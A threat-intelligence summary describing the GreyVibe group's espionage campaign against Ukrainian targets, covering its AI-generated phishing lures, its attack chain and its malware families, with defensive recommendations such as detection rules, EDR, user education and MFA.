GreyVibe Targets Ukraine with AI-Generated Lures and Custom Malware

The GreyVibe threat group, believed to be Russian-aligned, has been actively targeting Ukrainian entities since at least August 2025. WithSecure discovered this campaign in January 2026, revealing that GreyVibe leverages AI tools like ChatGPT, Ideogram AI, and Google Gemini to generate realistic lures for their cyberespionage operations. The targets include organizations in the military, government, civilian, and business sectors within Ukraine and those related to Ukraine. GreyVibe utilizes diverse attack chains, including spear-phishing (PhantomMail), fake CAPTCHA pages (PhantomClick), and malicious websites (PrincessClub, DroneLink, Nebo) to deliver custom malware such as PhantomRelay, LegionRelay, and FallSpy. The threat actor also uses AI assistance in developing malware obfuscators and RATs.

Attack Chain

1. Initial Access (PhantomMail): GreyVibe sends spear-phishing emails to Ukrainian targets using Google Drive and 4sync links, delivering malicious ZIP/RAR archives.
2. Deception: Victims are presented with decoy PDF documents or fake error messages to conceal the malicious payload.
3. Execution (PhantomClick): Victims are redirected to fake CAPTCHA or ClickFix pages disguised as Zoom or LAPAS sites.
4. Command Execution: Targets are tricked into executing self-infecting commands via fake Cloudflare verification prompts.
5. Malware Installation (PrincessClub, DroneLink): Victims visiting fake Ukrainian adult/dating websites or Ukrainian military charity websites are infected with FallSpy Android spyware and PhantomRelay/LegionRelay Windows malware.
6. Data Collection (FallSpy, LegionRelay): FallSpy collects contact lists, call logs, device/network information, location data, media files, and SIM information. LegionRelay supports file theft, screenshot capturing, browser credential theft, Telegram/WhatsApp data exfiltration, and RDP access setup.
7. Command and Control (PhantomRelay): PhantomRelay establishes command and control, enabling system fingerprinting, dynamic script loading, and PowerShell and Windows command execution.
8. Exfiltration: Stolen data is exfiltrated to attacker-controlled servers, supporting cyberespionage objectives.

Impact

GreyVibe’s cyberespionage campaign targets Ukrainian military, government, civilian, and business sectors to gather intelligence aligned with potential Russian interests. Successful attacks can lead to the compromise of sensitive data, including personal information, military communications, and business intelligence, potentially harming national security and economic stability. The use of AI-generated lures enhances the credibility of phishing campaigns, increasing the likelihood of successful breaches. While the precise number of victims is unknown, the ongoing nature of the campaign and the breadth of targeted sectors indicate a significant and persistent threat.

Recommendation

• Deploy the following Sigma rule to detect the execution of self-infecting commands related to the PhantomClick campaign, triggered by fake Cloudflare verification prompts (rules > Fake Cloudflare Verification Prompt).
• Monitor network connections for suspicious PowerShell commands indicative of PhantomRelay or LegionRelay activity (rules > Suspicious PowerShell Network Connection).
• Enable endpoint detection and response (EDR) systems to detect and block the execution of PhantomRelay and LegionRelay, focusing on PowerShell scripts with data exfiltration capabilities.
• Educate users about spear-phishing tactics, especially those using AI-generated lures that impersonate Ukrainian government, emergency, telecom, and energy entities (PhantomMail).
• Implement multi-factor authentication (MFA) for all critical systems to mitigate the risk of credential theft via LegionRelay.